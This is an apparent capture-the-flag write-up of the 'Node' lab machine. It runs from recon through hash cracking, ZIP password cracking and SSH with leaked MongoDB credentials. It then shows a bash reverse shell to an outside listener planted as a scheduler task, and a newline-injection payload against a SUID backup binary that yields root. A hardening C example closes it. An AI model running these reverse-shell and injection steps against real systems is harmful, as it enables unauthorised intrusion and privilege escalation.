
Node (Medium)


Last updated 2 years ago

Lesson Learn

Report-Penetration

Vulnerable Exploit: Unrestricted access to sensitive information and weak password policy

System Vulnerable: 10.10.10.58

Vulnerability Explanation: Fuzzing hidden files and directories exposed an API path that returned the list of users together with their password hashes. Because the passwords were weak, the hashes could be cracked, which gave access to a backup file that stored user credentials.

Privilege Escalation Vulnerability: Misconfigured group permission on the backup binary

Vulnerability Fix: Restrict access to the sensitive API path and implement a strong password policy

Severity: High

Steps to Compromise the Host:

Reconnaissance

Start by scanning all TCP ports.

└─$ sudo nmap -p- --min-rate 10000 10.10.10.58 > nmap.txt
└─$ cat nmap.txt                                      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:35 EST
Nmap scan report for 10.10.10.58
Host is up (0.077s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Filter out the unnecessary characters and keep only the open port numbers, comma-separated, for the service scan.

└─$ cat nmap.txt | grep open | awk -F / '{print $1}' | sed -z "s/\n/,/g" | head -c-1
22,3000 
└─$ nmap -sC -sV -T4 -p22,3000 10.10.10.58 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:36 EST
Nmap scan report for 10.10.10.58
Host is up (0.043s latency).

PORT     STATE SERVICE            VERSION
22/tcp   open  ssh                OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
└─$ nmap -sV -p22,3000 10.10.10.58 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-07 03:49 EST
Nmap scan report for 10.10.10.58
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Port 3000 Apache Hadoop

First, check the web page. Browsing to port 3000 displays a website called MyPlace.

Clicking through each user profile returns nothing of interest. There is a login option. Viewing the page source shows no noteworthy comments either.

Running hidden directory discovery did not find anything interesting.

└─$ feroxbuster -u http://10.10.10.58:3000

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.58:3000
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
WLD       90l      249w     3861c Got 200 for http://10.10.10.58:3000/d07d3890615d4d00933a2596c31d7303 (url length: 32)
WLD         -         -         - Wildcard response is static; auto-filtering 3861 responses; toggle this behavior by using --dont-filter
WLD       90l      249w     3861c Got 200 for http://10.10.10.58:3000/93894b020e0c44c2a7cd77c55c739cd867505ed2d2404e2ba22ff83a53713f4722d6d1ff049a4300ab75280dbd59ed0f (url length: 96)
301        9l       15w      173c http://10.10.10.58:3000/uploads
301        9l       15w      171c http://10.10.10.58:3000/assets
301        9l       15w      177c http://10.10.10.58:3000/assets/js
301        9l       15w      179c http://10.10.10.58:3000/assets/css
301        9l       15w      187c http://10.10.10.58:3000/assets/js/misc
301        9l       15w      185c http://10.10.10.58:3000/assets/js/app
301        9l       15w      209c http://10.10.10.58:3000/assets/js/app/controllers
301        9l       15w      171c http://10.10.10.58:3000/vendor
301        9l       15w      185c http://10.10.10.58:3000/vendor/jquery
301        9l       15w      175c http://10.10.10.58:3000/partials
[####################] - 8m    299990/299990  0s      found:12      errors:1396   
[####################] - 7m     30001/29999   65/s    http://10.10.10.58:3000
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/uploads
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/assets
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/assets/js
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/assets/css
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/assets/js/misc
[####################] - 7m     29999/29999   65/s    http://10.10.10.58:3000/assets/js/app
[####################] - 7m     29999/29999   66/s    http://10.10.10.58:3000/vendor
[####################] - 7m     29999/29999   67/s    http://10.10.10.58:3000/vendor/jquery
[####################] - 6m     29999/29999   79/s    http://10.10.10.58:3000/partials

Let's go back to the webpage and press Ctrl+Shift+C > Debugger. We can see there are some custom scripts.

Going through admin.js and /api/admin/backup, the endpoint returns authenticated: false.

Going through home.js and /api/users/latest, we find 3 usernames with password hashes, none of them an admin account.

Again, going through profiles.js, we find the code /api/users + $routeParams.username.

Following /api/users, we find 4 users, and 1 of them is admin.

Let's grab all the hashes and try to crack them in case the users chose weak passwords. Go to crackstation and paste all the hashes in. Immediately, 3 of the hashes are cracked.

└─$ curl -s 10.10.10.58:3000/api/users | jq -r '.[].password'                      
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

Logging in with a cracked username and password on the webpage works. Once we are in, it allows us to download a backup file. Let's download it and check whether there is anything interesting.

Checking the file type: it contains ASCII text with very long lines.

└─$ file myplace.backup 
myplace.backup: ASCII text, with very long lines, with no line terminatorsm

└─$ wc -l myplace.backup            
0 myplace.backup

└─$ wc -m myplace.backup
3459880 myplace.backup

Checking the content of the file, it looks base64 encoded: the set of distinct characters in the file (listed with od below) is exactly the base64 alphabet plus the + / = symbols.

└─$ head -c100 myplace.backup
UEsDBAoAAAAAAHtvI0sAAAAAAAAAAAAAAAAQABwAdmFyL3d3dy9teXBsYWNlL1VUCQADyfyrWfegh2F1eAsAAQQAAAAABAAAAABQ 

└─$ cat myplace.backup | od -cvAnone -w1 | sort -bu | tr -d '\n' | tr -d ' '
+/=0123456789aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ 

After base64-decoding it into myplace.back.decode, checking the file type again shows a ZIP archive. List the contents of the zip.

└─$ file myplace.back.decode                                                                                                                                            2 ⨯
myplace.back.decode: Zip archive data, at least v1.0 to extract

└─$ unzip -l myplace.back.decode
Archive:  myplace.back.decode
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2017-09-03 08:59   var/www/myplace/
    21264  2017-09-01 19:10   var/www/myplace/package-lock.json
        0  2017-09-01 19:10   var/www/myplace/node_modules/
        0  2017-09-01 19:10   var/www/myplace/node_modules/serve-static/
     7508  2017-02-24 21:17   var/www/myplace/node_modules/serve-static/README.md
     4533  2017-02-25 18:11   var/www/myplace/node_modules/serve-static/index.js
     1189  2017-02-24 21:01   var/www/myplace/node_modules/serve-static/LICENSE
     8504  2017-08-06 01:45   var/www/myplace/node_modules/serve-static/HISTORY.md
     2175  2017-09-01 19:10   var/www/myplace/node_modules/serve-static/package.json

Let's try to unzip the file, but it requires a password which we don't know.

└─$ unzip myplace.back.decode
Archive:  myplace.back.decode
[myplace.back.decode] var/www/myplace/package-lock.json password: 

Cracking ZipFile With John

We can use zip2john to extract a crackable hash from the zip file.

└─$ /usr/sbin/zip2john myplace.back.decode 2>/dev/null | tee myplace.zip.hash
myplace.back.decode:$pkzip2$3*2*1*0*8*24*9c88*1223*9e0e24bcc2498c98f24ce04142016c67617a0e963abdd7c381c13918adee52822712e61d*1*0*8*24*37ef*0145*fe81ba228776f05e1139e2e1a9fea6354c87a73c7b519e1103b4b62713affef089e5b3a1*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*6902f97145238389acd785b62b0077ce1e*$/pkzip2$::myplace.back.decode:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:myplace.back.decode
    - 2>/dev/null (Don't display error message)
    - tee (copy standard input to the file myplace.zip.hash)
└─$ sudo john myplace.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt               
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])

└─$ sudo john myplace.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=PKZIP
[sudo] password for pwned: 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword        (myplace.back.decode)
1g 0:00:00:00 DONE (2021-11-07 05:14) 5.882g/s 1084Kp/s 1084Kc/s 1084KC/s sandrea..joan08
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Cracking ZipFile with Fcrack

└─$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.back.decode
possible pw found: magicword ()
   
    -D (Dictionary attack)
    -p (Password File)

Now we can unzip the file. Enumerating the extracted files, we find credentials in app.js.

└─$ cat app.js  

const express     = require('express');
const session     = require('express-session');
const bodyParser  = require('body-parser');
const crypto      = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const path        = require("path");
const spawn        = require('child_process').spawn;
const app         = express();
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key  = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';

Exploitation

Shell as Mark

We can now SSH to the machine with the credentials of user mark.

└─$ ssh mark@10.10.10.58                                                     
mark@10.10.10.58's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


              .-. 
        .-'``(|||) 
     ,`\ \    `-`.                 88                         88 
    /   \ '``-.   `                88                         88 
  .-.  ,       `___:      88   88  88,888,  88   88  ,88888, 88888  88   88 
 (:::) :        ___       88   88  88   88  88   88  88   88  88    88   88 
  `-`  `       ,   :      88   88  88   88  88   88  88   88  88    88   88 
    \   / ,..-`   ,       88   88  88   88  88   88  88   88  88    88   88 
     `./ /    .-.`        '88888'  '88888'  '88888'  88   88  '8888 '88888' 
        `-..-(   ) 
              `-` 




The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ 

We are now on the machine, but there is no flag for user mark. Enumerating the machine, we find 3 users whose shell is /bin/bash.

mark@node:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash

Searching for the user flag, we find it under user tom, readable only by root and tom. So we need to escalate to user tom or root.

mark@node:~$ locate user.txt
/home/tom/user.txt
mark@node:~$ ls -l /home/tom/user.txt
-rw-r----- 1 root tom 33 Sep  3  2017 /home/tom/user.txt

Shell as Tom

Let's check the service ports listening on the machine and the processes that user tom is running.

mark@node:/tmp$ netstat -tupln                                                                                                                                                                
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::3000                 :::*                    LISTEN      -               
mark@node:/tmp$ ps aux | grep tom
tom       1223  0.1  5.3 1019880 40400 ?       Ssl  15:05   0:00 /usr/bin/node /var/www/myplace/app.js
tom       1228  0.0  5.9 1007544 45020 ?       Ssl  15:05   0:00 /usr/bin/node /var/scheduler/app.js

Auto script JS

We can see port 27017 (MongoDB) listening on localhost only. Let's check the contents of both /var/www/myplace/app.js and /var/scheduler/app.js.

We already checked the contents of /var/www/myplace/app.js, but not /var/scheduler/app.js.

mark@node:/tmp$ cat /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});

The script connects to the mongo database as mark (the same credentials found in the web app's app.js) and, every 30 seconds, reads every document in the tasks collection, runs doc.cmd with exec, and deletes the document. Since the scheduler process runs as tom, anything written into tasks is executed as tom.

Let's connect to the mongo database with that username and password.

mark@node:/tmp$ mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> db # show all the tables in databases
scheduler 
> show collections # show collections in current database
tasks
> db.tasks.find() # list objects in collection tasks but there is no objects

Now let's add a reverse shell as a task object.

> db.tasks.insert({cmd: "bash -c 'bash -i >& /dev/tcp/10.10.14.31/5555 0>&1'"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6187f1e22700092779a3579b"), "cmd" : "bash -c 'bash -i >& /dev/tcp/10.10.14.31/5555 0>&1'" }

Start a netcat listener on port 5555 and wait a short while for the shell to pop up.

└─$ nc -lvp 5555                    
listening on [any] 5555 ...
10.10.10.58: inverse host lookup failed: Unknown host
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.58] 37476
bash: cannot set terminal process group (1228): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ whoami
whoami
tom

As we can see, user tom is a member of the admin group.

Privilege Escalation

Let's check whether there are misconfigured file permissions, starting with SUID binaries.

tom@node:/$ find / -type f -perm -4000 -ls 2>/dev/null   
   259267     12 -rwsr-xr-x   1 root     root        10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
   297906     80 -rwsr-xr-x   1 root     root        81672 Jul 17  2017 /usr/lib/snapd/snap-confine
   278211     44 -rwsr-xr--   1 root     messagebus    42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   278959     40 -rwsr-xr-x   1 root     root          38984 Jun 14  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
    17884    420 -rwsr-xr-x   1 root     root         428240 Mar 16  2017 /usr/lib/openssh/ssh-keysign
   282088     16 -rwsr-xr-x   1 root     root          14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
   303364     20 -rwsr-xr--   1 root     admin         16484 Sep  3  2017 /usr/local/bin/backup
   258944     52 -rwsr-xr-x   1 root     root          49584 May 17  2017 /usr/bin/chfn
   281144     52 -rwsr-sr-x   1 daemon   daemon        51464 Jan 14  2016 /usr/bin/at
   259007     76 -rwsr-xr-x   1 root     root          75304 May 17  2017 /usr/bin/gpasswd
   279006     36 -rwsr-xr-x   1 root     root          32944 May 17  2017 /usr/bin/newgidmap
   258946     40 -rwsr-xr-x   1 root     root          40432 May 17  2017 /usr/bin/chsh
   259166    136 -rwsr-xr-x   1 root     root         136808 Jul  4  2017 /usr/bin/sudo
   282096     24 -rwsr-xr-x   1 root     root          23376 Jan 17  2016 /usr/bin/pkexec
   259071     40 -rwsr-xr-x   1 root     root          39904 May 17  2017 /usr/bin/newgrp
   259082     56 -rwsr-xr-x   1 root     root          54256 May 17  2017 /usr/bin/passwd
   279005     36 -rwsr-xr-x   1 root     root          32944 May 17  2017 /usr/bin/newuidmap
   258636     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
   258671     28 -rwsr-xr-x   1 root     root          27608 Jun 14  2017 /bin/umount
   278644     32 -rwsr-xr-x   1 root     root          30800 Jul 12  2016 /bin/fusermount
   258637     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
   278666    140 -rwsr-xr-x   1 root     root         142032 Jan 28  2017 /bin/ntfs-3g
   258653     40 -rwsr-xr-x   1 root     root          40128 May 17  2017 /bin/su
   258622     40 -rwsr-xr-x   1 root     root          40152 Jun 14  2017 /bin/mount

We can see one root-owned SUID binary that is executable by the admin group.

303364     20 -rwsr-xr--   1 root     admin         16484 Sep  3  2017 /usr/local/bin/backup

Going back to app.js, we find where this binary is used.

app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

      proc.on("exit", function(exitCode) {
        res.header("Content-Type", "text/plain");
        res.header("Content-Disposition", "attachment; filename=myplace.backup");
        res.send(backup);
      });

      proc.stdout.on("data", function(chunk) {
        backup += chunk;
      });

      proc.stdout.on("end", function() {
      });

The app invokes the binary with three arguments: -q, backup_key, and __dirname (the directory of app.js). Running it ourselves with /root as the target produces an encoded backup, but the root.txt it contains is not the real flag.

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root

[+] Finished! Encoded backup is below:
(base64-encoded output omitted)
└─$ cat troll.txt| base64 -d > troll.zip

└─$ 7z e troll.zip

└─$ cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ

But if we just specify root (rather than /root) as the argument and extract the resulting archive, it displays the correct content of the root flag.

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
└─$ cat testing.txt | base64 -d > testing.zip

└─$ 7z e testing.zip

Priv-Esc Technique

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "as
> /bin/bash
> asd"
        zip warning: name not matched: as

zip error: Nothing to do! (try: zip -r -P magicword /tmp/.backup_2015693318 . -i as)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@node:/# whoami
root
root@node:/# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(printf 'abc\n/bin/bash\nabc')"
        zip warning: name not matched: aaa

zip error: Nothing to do! (try: zip -r -P magicword /tmp/.backup_497775969 . -i aaa)
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@node:/# whoami
root
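The root cause above is that the SUID helper pastes the user-controlled path into one shell command string ("zip -r -P magicword /tmp/.backup_N . -i <arg>"), and its character blacklist does not cover the newline that ends a shell command. The hardened counterpart, as an added example that is not the backup binary's own code: an allowlist validator instead of a blacklist, and an argv vector for execvp() instead of a string for system(). The function names, the 255-byte limit and the "/root" rule are assumptions modelled on what the page shows.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

/* Allowlist validator (assumed design, not the page's binary): accept only
 * characters that a relative include pattern needs. A newline, ';', '$',
 * '`', '|', '&', quotes and whitespace all fail this test, so the check does
 * not depend on remembering every shell metacharacter the way a blacklist does.
 * Returns 1 if arg is acceptable, 0 otherwise. */
int is_safe_backup_arg(const char *arg)
{
    if (arg == NULL || *arg == '\0' || strlen(arg) > 255)
        return 0;
    for (const char *p = arg; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '/'))
            return 0;
    }
    /* Path rules: no absolute paths, no traversal, and no /root tree
     * (the page notes that the binary refuses "/root"). */
    if (arg[0] == '/' || strstr(arg, "..") != NULL || strstr(arg, "/root") != NULL)
        return 0;
    return 1;
}

/* Build the argv vector for execvp("zip", argv) rather than a command string
 * for system(). Every element reaches zip verbatim and no shell parses it, so
 * even "as\n/bin/bash\nasd" stays one include pattern that zip simply reports
 * as "name not matched". Returns the element count (excluding the NULL
 * terminator) or -1 if the caller's array is too small. */
int build_backup_argv(const char *archive, const char *include,
                      char **argv, size_t cap)
{
    const char *fixed[] = { "zip", "-r", "-P", "magicword" };
    size_t n = sizeof(fixed) / sizeof(fixed[0]);

    /* fixed words + archive + "." + "-i" + include + NULL terminator */
    if (archive == NULL || include == NULL || cap < n + 5)
        return -1;
    for (size_t i = 0; i < n; i++)
        argv[i] = (char *)fixed[i];
    argv[n++] = (char *)archive;
    argv[n++] = ".";
    argv[n++] = "-i";
    argv[n++] = (char *)include;
    argv[n] = NULL;
    return (int)n;
}
```

Detection-wise, the tell in the page's transcript is the injected argument: a "name not matched" warning whose pattern is only the first line of a multi-line string, followed by a root shell.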

Let's start by executing the file with the following parameter; otherwise we could not read the file properly. From , /root is treated as bad characters, so once we decode the base64 output it shows a troll face.

Ippsec's Video